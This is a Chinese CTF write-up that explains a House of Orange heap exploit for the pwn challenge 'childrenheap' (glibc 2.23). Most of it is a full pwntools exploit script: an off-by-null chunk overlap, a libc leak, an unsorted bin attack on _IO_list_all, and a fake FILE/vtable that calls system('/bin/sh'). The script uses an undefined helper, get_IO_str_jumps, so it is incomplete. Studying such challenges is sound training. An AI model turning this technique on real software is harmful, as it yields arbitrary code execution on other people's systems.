本文详细介绍了如何利用House of Orange技术来针对存在off-by-null漏洞的程序进行攻击。通过逆向分析,作者展示了如何通过申请和释放chunk,修改内存布局,最终实现unsorted bin attack,并利用jumps表进行getshell。文章提供了完整的exploit代码,包括利用off-by-null,控制unsorted bin,以及触发system调用来执行shell。
**前言:一道关于house of orange的一道利用题目,我感觉house of orange就是模板化的攻击
遍历。list_all,修改vtable指针。,再利用jumps进行跳转,这些,不理解的化,可以去这里https://ctf-wiki.org/pwn/linux/user-mode/io-file/exploit-in-libc2.24/ 里面有很详细的简绍,这里只付出一道关于house of orange的一道pwn题exp
思路:通过逆向分析,发现题目有off-by-null,第一步多申请几个chunk,free掉第一个chunk,编辑第二个chunk进行修改presize的size,再free掉第三个触发off-by-null向前合并,再free,再申请0x100(0xf0),进行错位,再进行填充就能直接填充chunk1的presize和size位了,进行unsortbin attack绕过unlink,然后再遍历触发stderr进行getshell**
exp:
#coding:utf8
from pwn import *
sh = process('./cscctf_2019_final_childrenheap')
#sh = remote('node4.buuoj.cn',25313)
libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
malloc_hook_s = libc.symbols['__malloc_hook']
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()
def add(index,size,content):
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:',str(index))
sh.sendlineafter('Size:',str(size))
sh.sendafter('Content:',content)
def edit(index,content):
sh.sendlineafter('>>','2')
sh.sendlineafter('Index:',str(index))
sh.sendafter('Content:',content)
def show(index):
sh.sendlineafter('>>','3')
sh.sendlineafter('Index:',str(index))
def delete(index):
sh.sendlineafter('>>','4')
sh.sendlineafter('Index:',str(index))
add(0,0xF0,'a') #0
add(1,0xF8,'b') #1
add(2,0xF0,'c') #2
add(3,0x10,'d') #3
delete(0)
#null off by one
edit(1,'d'*0xF0 + p64(0x100 + 0x100))
delete(2)
add(0,0xF0,'a')
show(1)
sh.recvuntil('content: ')
main_arena_88 = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
_IO_list_all_addr = libc_base + _IO_list_all_s
_IO_str_jumps_addr = libc_base + get_IO_str_jumps()
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'system_addr=',hex(system_addr)
print '_IO_list_all_addr=',hex(_IO_list_all_addr)
delete(0)
add(0,0x100,'a')
#通过1,可以完全控制unsorted bin,我们可以用house of orange
fake_file = p64(0) + p64(0x60)
fake_file += p64(0) + p64(_IO_list_all_addr - 0x10) #unsorted bin attack在_IO_list_all_addr写入main_arena地址
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(binsh_addr)
fake_file = fake_file.ljust(0xD8,'\x00')
#vtable指针
fake_file += p64(_IO_str_jumps_addr - 8)
fake_file += p64(0) + p64(system_addr)
edit(1,fake_file)
gdb.attach(sh)
#getshell
sh.sendlineafter('>>','1')
sh.sendlineafter('Index:','7')
sh.sendlineafter('Size:',str(0x60))
sh.interactive()
总结:如果上面有说错的,也是怪我太懒了,所以这里各位尽情的理解吧!!!!溜了溜了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
